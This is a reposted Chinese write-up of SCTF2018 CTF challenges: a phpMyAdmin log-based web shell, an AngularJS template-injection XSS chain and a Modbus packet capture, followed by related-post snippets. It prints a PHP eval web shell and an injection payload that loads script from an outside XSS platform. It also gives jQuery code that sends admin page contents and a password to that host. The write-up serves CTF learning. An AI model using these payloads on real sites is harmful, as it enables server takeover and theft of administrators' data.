SCTF2018 Writeup

最新推荐文章于 2022-02-10 17:09:57 发布
最新推荐文章于 2022-02-10 17:09:57 发布
阅读量1k 收藏
点赞数
文章标签: php 网络 操作系统
原文链接:http://www.cnblogs.com/Jas502n/p/9228589.html
版权 
 
 
 
  
    _____  _____ _______ ______ 
   / ____|/ ____|__   __|  ____|
  | (___ | |       | |  | |__   
   \___ \| |       | |  |  __|  
   ____) | |____   | |  | |     
  |_____/ \_____|  |_|  |_|     
                                
                                
 
  
 
 
 
 
 
 
 
 
__________WEB_____________
 
 
0x01 easiest web – phpMyAdmin
 
 
思路: 弱口令(root / root)登陆phpmyadmin,利用日志功能进行getshell
 
 
 
  
送分题,轻松一下

http://47.97.214.247:20001/phpmyadmin

Alternate address:

http://218.245.4.98:20000/phpmyadmin
 
 
 
 
 
 
 
 
 
 
 
 
开启日志,写入一句话
 
 
 
 
 
 
 
查询sql语句
 
 
 
  
<?php @eval($_POST['cmd']);?>
 
 
 
 
 
 
 
日志写入到网站路径下的dasdasdas.php文件
 
 
然后就getshell
 
 
 
 
 
  
http://218.245.4.98:20000/dasdasdad.php

密码:cmd

菜刀连接
 
 
 
 
 
 
 
 
 
 
 
 
在C盘发现flag
 
 
 
 
 
  
sctf{31cf2213cc49605a30f07395d6e5b9c4}
 
 
 
 
 
 
 
 
 
 
0x02  新的建议板
 
 
 解题思路:从前台发现留言板存在anjularjs的模板注入 ,js中发现api接口,发现需要另外一个管理员账号post带入访问密码才能获取到flag
 
 
 
 
 
 
  
师傅最近开始学前端 想写个建议板 后来失败了?

http://116.62.137.114:4879
 
 
 
 
 
 
 
 
 
Anjularjs的模板注入 
 
 
Payload: 
 
 
 
  
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(123)//');}} 
 
 
 
 
 用eval(atob("base64"))进行base64加密,绕过过滤
 
 
1.1 利用xss获取管理员后台地址
 
 
xss平台地址:
 
 
 
  
http://xsspt.com/aQCIrX?1529652200
 
 
 
 
 
 
 
使用getScript方法动态加载JS:
 
 
 
  
$.getScript('http://xsspt.com/aQCIrX?1529652200');  >>base64 >> JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK
 
 
 
 
 
 
 
 
  
eval(atob("JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK"));
 
 
 
 
 
 
 
在留言板输入下面Payload 可以打到管理员的后台地址和cookie:
 
 
 
  
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
 
 
 
 
 
 
 
 
 
 
 
 
 
  
location : http://127.0.0.1:1002/admin/suggest?suggest=%7B%7B'a'.constructor.prototype.charAt=[].join;$eval('x=1%7D%20%7D%20%7D;eval(atob(%5C'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK%5C'));//');%7D%7D%0D%0A
 
 
 
 
 
 
 
url解码:
 
 
 
  
location : http://127.0.0.1:1002/admin/suggest?suggest={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
 
 
 
 
 
 
 
可以发现后台地址在内网http://127.0.0.1:1002/admin/
 
 
 
 
 
1.2 利用Jquery获取后台页面源码
 
 
首先在xss平台新建模块如下所示:
 
 
 
 
代码:
 
 
 
  
$.ajax({
        url: "/admin",
        type: "GET",
        dataType: "text",
        success: function(result) {
            var code = btoa(encodeURIComponent(result));
            xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);
        },
        error: function(msg) {
    
        }
    })
    
    function xssPost(url, postStr) {
        var de;
        de = document.body.appendChild(document.createElement('iframe'));
        de.src = 'about:blank';
        de.height = 1;
        de.width = 1;
        de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
        de.contentDocument.forms[0].submit();
        de.style.display = 'none';
    }

 
 
 
 
  此时获取后台的xss模块已经建立好,需要在原有模块上更新使用模块,默认是使用获取cookie的模块
 
 
 
 
 
 
 
然后再在留言板上输入payload:
 
 
 
  
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
 
 
 
 
 
 
 
 稍等片刻,即可获取到消息
 
 
 
 
复制code后面的base64代码:
 
 
 
  
code: JTNjIURPQ1RZUEUraHRtbCUzZSUwZCUwYSUzY2h0bWwrbGFuZyUzZCUyMnpoLUNOJTIyJTNlJTBkJTBhKyslM2NoZWFkJTNlJTBkJTBhKysrKyUzY21ldGErY2hhcnNldCUzZCUyMnV0Zi04JTIyJTNlJTBkJTBhKysrKyUzY21ldGEraHR0cC1lcXVpdiUzZCUyMlgtVUEtQ29tcGF0aWJsZSUyMitjb250ZW50JTNkJTIySUUlM2RlZGdlJTIyJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMnZpZXdwb3J0JTIyK2NvbnRlbnQlM2QlMjJ3aWR0aCUzZGRldmljZS13aWR0aCUyYytpbml0aWFsLXNjYWxlJTNkMSUyMiUzZSUwZCUwYSsrKyslM2MhLS0rJWU0JWI4JThhJWU4JWJmJWIwMyVlNCViOCVhYW1ldGElZTYlYTAlODclZTclYWQlYmUqJWU1JWJmJTg1JWU5JWExJWJiKiVlNiU5NCViZSVlNSU5YyVhOCVlNiU5YyU4MCVlNSU4OSU4ZCVlOSU5ZCVhMiVlZiViYyU4YyVlNCViYiViYiVlNCViZCU5NSVlNSU4NSViNiVlNCViYiU5NiVlNSU4NiU4NSVlNSVhZSViOSVlOSU4MyViZColZTUlYmYlODUlZTklYTElYmIqJWU4JWI3JTlmJWU5JTlhJThmJWU1JTg1JWI2JWU1JTkwJThlJWVmJWJjJTgxKy0tJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMmRlc2NyaXB0aW9uJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbWV0YStuYW1lJTNkJTIyYXV0aG9yJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbGluaytyZWwlM2QlMjJpY29uJTIyK2hyZWYlM2QlMjIlMjIlM2UlMGQlMGElMGQlMGErKysrJTNjdGl0bGUlM2VTWUMlM2MlMmZ0aXRsZSUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmY3NzJTJmYm9vdHN0cmFwLm1pbi5jc3MlMjIrcmVsJTNkJTIyc3R5bGVzaGVldCUyMiUzZSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJjc3MlMmZpZTEwLXZpZXdwb3J0LWJ1Zy13b3JrYXJvdW5kLmNzcyUyMityZWwlM2QlMjJzdHlsZXNoZWV0JTIyJTNlJTBkJTBhKysrKyUzY2xpbmsraHJlZiUzZCUyMmNzcyUyZnN0YXJ0ZXItdGVtcGxhdGUuY3NzJTIyK3JlbCUzZCUyMnN0eWxlc2hlZXQlMjIlM2UlMGQlMGErKysrJTNjc3R5bGUrdHlwZSUzZCUyMnRleHQlMmZjc3MlMjIlM2UlMGQlMGErKysrKysrKysrYm9keSslN2IlMGQlMGErKysrKysrKysrKytwYWRkaW5nLXRvcCUzYSs2MHB4JTNiJTBkJTBhKysrKysrKysrKysrcGFkZGluZy1ib3R0b20lM2ErNDBweCUzYiUwZCUwYSsrKysrKysrKyslN2QlMGQlMGErKysrKysrKyUzYyUyZnN0eWxlJTNlJTBkJTBhJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmFuZ3VsYXIuanMlMmYxLjQuNiUyZmFuZ3VsYXIubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmFwcHMuYmRpbWcuY29tJTJmbGlicyUyZmFuZ3VsYXItcm91dGUlMmYxLjMuMTMlMmZhbmd1bGFyLXJvdXRlLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllLWVtdWxhdGlvbi1tb2Rlcy13YXJuaW5nLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTBkJTBhKyslM2MlMmZoZWFkJTNlJTBkJTBhJTBkJTBhKyslM2Nib2R5KyUzZSUwZCUwYSUwZCUwYSsrKyslM2NuYXYrY2xhc3MlM2QlMjJuYXZiYXIrbmF2YmFyLWludmVyc2UrbmF2YmFyLWZpeGVkLXRvcCUyMiUzZSUwZCUwYSsrKysrKyUzY2RpditjbGFzcyUzZCUyMmNvbnRhaW5lciUyMiUzZSUwZCUwYSsrKysrKysrJTNjZGl2K2NsYXNzJTNkJTIybmF2YmFyLWhlYWRlciUyMiUzZSUwZCUwYSsrKysrKysrKyslM2NidXR0b24rdHlwZSUzZCUyMmJ1dHRvbiUyMitjbGFzcyUzZCUyMm5hdmJhci10b2dnbGUrY29sbGFwc2VkJTIyK2RhdGEtdG9nZ2xlJTNkJTIyY29sbGFwc2UlMjIrZGF0YS10YXJnZXQlM2QlMjIlMjNuYXZiYXIlMjIrYXJpYS1leHBhbmRlZCUzZCUyMmZhbHNlJTIyK2FyaWEtY29udHJvbHMlM2QlMjJuYXZiYXIlMjIlM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyc3Itb25seSUyMiUzZVRvZ2dsZStuYXZpZ2F0aW9uJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKysrKyUzY3NwYW4rY2xhc3MlM2QlMjJpY29uLWJhciUyMiUzZSUzYyUyZnNwYW4lM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyaWNvbi1iYXIlMjIlM2UlM2MlMmZzcGFuJTNlJTBkJTBhKysrKysrKysrKysrJTNjc3BhbitjbGFzcyUzZCUyMmljb24tYmFyJTIyJTNlJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKyslM2MlMmZidXR0b24lM2UlMGQlMGErKysrKysrKysrJTNjYStjbGFzcyUzZCUyMm5hdmJhci1icmFuZCUyMitocmVmJTNkJTIyJTJmJTIyJTNlU1lDK0FETUlOJTNjJTJmYSUzZSUwZCUwYSsrKysrKysrJTNjJTJmZGl2JTNlJTBkJTBhKysrKysrKyslM2NkaXYraWQlM2QlMjJuYXZiYXIlMjIrY2xhc3MlM2QlMjJjb2xsYXBzZStuYXZiYXItY29sbGFwc2UlMjIlM2UlMGQlMGErKysrKysrKysrJTNjdWwrY2xhc3MlM2QlMjJuYXYrbmF2YmFyLW5hdiUyMiUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpK2NsYXNzJTNkJTIyYWN0aXZlJTIyJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlSG9tZSUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlJWU2JTk3JWE1JWU1JWJmJTk3JTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTglYjQlYTYlZTUlOGQlOTUlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrKyslM2NsaSUzZSUzY2EraHJlZiUzZCUyMmFkbWluJTJmZmlsZSUyMiUzZSVlNiU5NiU4NyVlNCViYiViNiUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyYWRtaW4lMmZzdWdnZXN0JTIyJTNlJWU3JTk1JTk5JWU4JWE4JTgwJTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTUlOGYlOTElZTUlYjglODMlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrJTNjJTJmdWwlM2UlMGQlMGErKysrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKyslM2MlMmZuYXYlM2UlMGQlMGElMGQlMGElMGQlMGElM2NkaXYrY2xhc3MlM2QlMjJjb250YWluZXIlMjIlM2UlMGQlMGErKyUzY2RpditjbGFzcyUzZCUyMmp1bWJvdHJvbiUyMiUzZSUwZCUwYSsrKysrKysrJTNjaDElM2VIRUxMTythZG1pbkNsb3VuZCUzYyUyZmgxJTNlJTBkJTBhKysrKysrKyslM2NwJTNlJWU2JTk2JWIwJWU3JTg5JTg4JWU1JTkwJThlJWU1JThmJWIwMi4wISUzYyUyZnAlM2UlMGQlMGErKyUzYyUyZmRpdiUzZSUwZCUwYSUzYyUyZmRpdiUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2MhLS0rQm9vdHN0cmFwK2NvcmUrSmF2YVNjcmlwdCUwZCUwYSUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCstLSUzZSUwZCUwYSUzYyEtLStQbGFjZWQrYXQrdGhlK2VuZCtvZit0aGUrZG9jdW1lbnQrc28rdGhlK3BhZ2VzK2xvYWQrZmFzdGVyKy0tJTNlJTBkJTBhJTNjc2NyaXB0K3NyYyUzZCUyMmh0dHBzJTNhJTJmJTJmY2RuLmJvb3Rjc3MuY29tJTJmanF1ZXJ5JTJmMS4xMi40JTJmanF1ZXJ5Lm1pbi5qcyUyMiUzZSUzYyUyZnNjcmlwdCUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmanMlMmZib290c3RyYXAubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTNjIS0tK0lFMTArdmlld3BvcnQraGFjaytmb3IrU3VyZmFjZSUyZmRlc2t0b3ArV2luZG93cys4K2J1ZystLSUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllMTAtdmlld3BvcnQtYnVnLXdvcmthcm91bmQuanMlMjIlM2UlM2MlMmZzY3JpcHQlM2UlMGQlMGElMGQlMGElM2MlMmZib2R5JTNlJTBkJTBhJTNjJTJmaHRtbCUzZSUwZCUwYSUwZCUwYQ==
 
 
 
 
保存在admin.txt
 
 
 
 
利用pentestbox进行base64解码
 
 
 
  
> cat admin.txt |base64 -d
 
 
 
 
 
 
再次进行url解码
 
 
 
 
 
 
 
解码结果保存在admiin.html
 
 
 
  
<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- 上述3个meta标签*必须*放在最前面,任何其他内容都*必须*跟随其后! -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="">

    <title>SYC</title>


    <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
    <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <link href="css/starter-template.css" rel="stylesheet">
    <style type="text/css">
          body {
            padding-top: 60px;
            padding-bottom: 40px;
          }
        </style>

    <script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>
    <script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script>
    <script src="js/ie-emulation-modes-warning.js"></script>

  </head>

  <body >

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="/">SYC ADMIN</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="#">Home</a></li>
            <li><a href="#">日志</a></li>
            <li><a href="#">账单</a></li>
            <li><a href="admin/file">文件</a></li>
            <li><a href="admin/suggest">留言</a></li>
            <li><a href="#">发布</a></li>
          </ul>
        </div>
      </div>
    </nav>


<div class="container">
  <div class="jumbotron">
        <h1>HELLO adminClound</h1>
        <p>新版后台2.0!</p>
  </div>
</div>


    <!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
<script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
<script src="js/ie10-viewport-bug-workaround.js"></script>

</body>
</html>
 
 
 
 
 
 
 
 
 
发现管理员账号: adminClound
 
 
 
 
 
1.3 利用js api接口,找到文件密码
 
 
在一开始的首页里有个 min-test.js ,这里泄露了admin模板文件view/admintest2313.html,在这个模板中发现一个备忘录的接口
 
 
 
 
 
 
替换成管理员账号,访问 http://116.62.137.114:4879/api/memos/adminClound
 
 
得到文件访问密码
 
 
 
 
 
 
 
拿到文件密码后,构造包访问 /admin/file页面和上面获取admin页面一样
 
 
 
  
<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- 上述3个meta标签*必须*放在最前面,任何其他内容都*必须*跟随其后! -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="">

    <title>SYC</title>


    <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
    <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <link href="css/starter-template.css" rel="stylesheet">
    <style type="text/css">
          body {
            padding-top: 60px;
            padding-bottom: 40px;
          }
        </style>

    <script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>
    <script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script>
    <script src="js/ie-emulation-modes-warning.js"></script>

  </head>

  <body >

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="/">SYC ADMIN</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="#">Home</a></li>
            <li><a href="#">日志</a></li>
            <li><a href="#">账单</a></li>
            <li><a href="admin/file">文件</a></li>
            <li><a href="admin/suggest">留言</a></li>
            <li><a href="#">发布</a></li>
          </ul>
        </div>
      </div>
    </nav>


<div class="container">
  <form method="post">
    <label for="filePasswd" class="sr-only">输入文件密码</label>
    <input type="text" id="filePasswd" class="form-control" placeholder="filepasswd" required="" autofocus="" name="filepasswd">
    <button class="btn btn-lg btn-primary btn-block" type="submit">提交</button>
  </form>
</div>

<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
<script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
<script src="js/ie10-viewport-bug-workaround.js"></script>

</body>
</html>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1.4 输入文件密码,获取flag
 
 
同样需要在xss平台设置模块,并引用该模块
 
 
 
 
 
  
$.ajax({
        url: "/admin/file",
        type: "POST",
        dataType: "text",
        data: "filepasswd=HGf^%2639NsslUIf^23",
        success: function(result) {
            var code = btoa(encodeURIComponent(result));
            xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);
        },
        error: function(msg) {
    
        }
    })
    
    function xssPost(url, postStr) {
        var de;
        de = document.body.appendChild(document.createElement('iframe'));
        de.src = 'about:blank';
        de.height = 1;
        de.width = 1;
        de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
        de.contentDocument.forms[0].submit();
        de.style.display = 'none';
    }
 
 
 
 
留言板再次提交payload
 
 
 
  
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
 
 
 
 
稍等片刻即可,查看xss平台
 
 
 
 
 
  
code : c2N0ZiU3QlQ0aXNfaXNfZjFhZzIzMTMlN0Q=
 
 
 
 
base64解码后再url解码
 
 
 
 
 
  
sctf{T4is_is_f1ag2313}
 
 
 
 
________________MiSC ________________
 
 
0x03  神奇的Modbus
 
 
思路:根据题目Modbus,只要过滤Modbus协议,跟随tcp流就可以找到flag
 
 
 
  
寻找flag
附件: http://sctf2018.xctf.org.cn/media/task/c7348d96-947d-48ef-a91d-2b3eb647d9a9.zip
 
 
 
 
 
 
下载附件,解压,用wireshark分析
 
 
 
 
 
 
 
过滤之前:
 
 
 
 
过滤之后:
 
 
 
 
跟随第一个tcp 流
 
 
 
 
找到flag
 
 
 
 
 
  
sctf{Easy_Mdbus}
 
 
 
 
提交答案发现不对
 
 
尝试加个o,提交正确
 
 
 
  
sctf{Easy_Modbus}
 
 
 
 
 
 

 

转载于:https://www.cnblogs.com/Jas502n/p/9228589.html

                

        

        




    

  


    

      

        

            

              
                
                  dieqiang4646
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
2018SUCTF部分wp

				
			

			

				

					Risker
				

				

					05-28
					
					2972
					
				

			

		

		

			
				
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...

			
		

	



                

              
                



	

		

			

				
					
SCTF 2020 部分WEB writeup

				
			

			

				

					qq_21912769的博客
				

				

					07-07
					
					720
					
				

			

		

		

			
				
Web
CloudDisk

Score: 250
flag: SCTF{47cf9489d8832e44312dssxag6f88f45736e0e9c8}

https://github.com/dlau/koa-body/issues/75

http://120.79.1.217:7777/uploadfile

{
	"files": {
		"file": {
			"name": "jankincai",
			"path": "./flag"
		}
	}
}

Upload success

			
		

	



                


  
              

                


	

		

			

				
					
2018 SCTF 部分wp

				
			

			

				

					Risker
				

				

					06-21
					
					2138
					
				

			

		

		

			
				
弱弱的web狗表示简直就没有活路....Webeasiest  web-phpmyadmin参考这篇:地址执行以下sql语句:set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php';
SELECT '&lt;?php assert($_POST["cmd"]);?&gt;'用...

			
		

	





	

		

			

				
					
[SCTF 2018]ZhuanXV

				
			

			

				

					Sk1y的博客
				

				

					12-19
					
					889
					
				

			

		

		

			
				
赛题:[SCTF 2018]ZhuanXV
文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞
读取文件
使用dirsearch工具进行扫描

发现/list,访问是个登录界面,查看源码

发现背景图片的路径

查看web.xml
http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml

发现使用了strut2框架,

struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主

			
		

	



		

			
		



	

		

			

				
					
SCTF2018 BabySyc - Simple PHP Web Writeup

				
			

			

				

					dengzhasong7076的博客
				

				

					06-20
					
					842
					
				

			

		

		

			
				
题目描述:
简单的php题目,来挑战一下吧 ~
http://116.62.71.206:52872/?f=login.php
前言
毕业前留下一点微小的贡献吧,此题主要是围绕php加密插件来出题的,其它的算是点缀,不过好像很多人在第二步上传卡死了。本来想第二早放提示,结果wupco师傅早上5点用了一个非预期解出了,Orz。
获取插件
漏洞点很明显,有一个文件包含,可以直接读取到/etc...

			
		

	





	

		

			

				
					
SCTF 2018_Simple PHP Web

				
			

			

				

					weixin_52268949的博客
				

				

					02-10
					
					503
					
				

			

		

		

			
				
SCTF 2018_Simple PHP Web
进入环境注意观察url
http://www.bmzclub.cn:23627/?f=login.php

有点像是文件读取我们尝试读一下/etc/passwd,直接读发现不行我们尝试使用伪协议
http://www.bmzclub.cn:23627/?f=php://filter/convert.base64-encode/resource=/etc/passwd

发现成功能读出

接下来我们尝试读取/flag
http://www.bmzclub.cn

			
		

	





	

		

			

				
					
SCTF2018-Event easiest web - phpmyadmin

				
			

			

				

					weixin_30753873的博客
				

				

					06-21
					
					139
					
				

			

		

		

			
				
6月19日的SCTF的web送分题。
打开链接是一个phpmyadmin的登陆界面,尝试用默认账号:root 密码:root登陆

于是直接进去了,首先看下数据库,除了些初始化的库以外,abc这个库比较在意。
查看一下里面的内容。

这个库估计是各个师傅们在做这个题的时候为了getshell创建的。
很明显是有个字段名是php一句话木马,之前没怎么接触数据库的getshell,于是...

			
		

	





	

		

			

				
					
2018 SUCTF pass

				
			

			

				

					ACdream
				

				

					06-07
					
					416
					
				

			

		

		

			
				
思路很棒的一个题,对AES-CBC模式的攻击也不是一次两次了,其实题目也给了思路,只是自己不清楚原理,导致看不懂提示做不出来题目代码:#coding: UTF-8
import socket
import flag
from Crypto.Cipher import AES

def padding(message):
    toPadByte = 16 - len(message) % 16
...

			
		

	





	

		

			

				
					
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup

				
			

			

				

					05-11
				

			

		

		

			
				
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页...

			
		

	





	

		

			

				
					
SCTF2020 官方Write-up.pdf

				
			

			

				

					07-08
				

			

		

		

			
				
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。

			
		

	





	

		

			

				
					
solr的download合集(原创高清无码)

				
			

			

				

					01-13
				

			

		

		

			
				
Solr is the popular, blazing-fast, open source enterprise search platform built on Apache Lucene™

			
		

	





	

		

			

				
					
Image2Html

				
			

			

				

					04-12
				

			

		

		

			
				
Image2Html是一款图片转换软件,能用于制作 PPT粒子动画……

			
		

	





	

		

			

				
					
【SCTF2020】signin WriteUp

				
			

			

				

					古月浪子的博客
				

				

					07-06
					
					1048
					
				

			

		

		

			
				
一道SCTF的逆向题,做了很久很久才做起,唉…

下载附件,打开发现是一个GUI程序

IDA打开,根据经验分析出这是一个pyqt程序,于是用解包脚本处理这个exe
脚本Github:pyinstxtractor
执行脚本后得到了一个解包后的文件夹

在这里我们重点关注main和struct文件


用WinHex打开,发现main其实是一个没有pyc文件头的pyc文件,而struct中有文件头


于是我们把struct的前16个字节添加到main的最前面,并改名为main.pyc,得到如下文

			
		

	





	

		

			

				
					
[SCTF2019]Flag Shop

				
			

			

				

					ChenZIDu的博客
				

				

					03-04
					
					1076
					
				

			

		

		

			
				
第一次遇见Ruby我去,以为是思路题~~~

首先页面是一个shop类的题

buy flag是购买flag,但是要求你的钱要到1e+27才行,work可以加钱,reset重置。审查页面元素没什么思路,发现robots.txt。
提示了/filebak
require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
requir...

			
		

	





	

		

			

				
					
BMZCTF-WEB-SCTF 2018_Simple PHP Web

				
			

			

				

					qq_24033605的博客
				

				

					05-24
					
					230
					
				

			

		

		

			
				
SCTF 2018_Simple PHP Web
看到url很容易想到文件读取漏洞。

尝试利用php伪协议读取/flag文件。

base64解码得到flag。




			
		

	





	

		

			

				
					
SUSCTF

				
			

			

				

					weixin_44319142的博客
				

				

					04-14
					
					469
					
				

			

		

		

			
				
Crypto
哈夫曼树构造
根据flag格式试着去构造

11
000111
11
00010
000110
100
00001
01
11
101
01
11
101
0010
0010
101
11
01
101
01
11
0011
100
0011
0011
11
11
01
11
101
01
11
11
101
100
101
11
100
11
101
0010
01
11
01
1...

			
		

	





	

		

			

				
					
ISCC 2018 PWN WriteUp

				
			

			

				

					lacoucou的专栏
				

				

					05-27
					
					2366
					
				

			

		

		

			
				
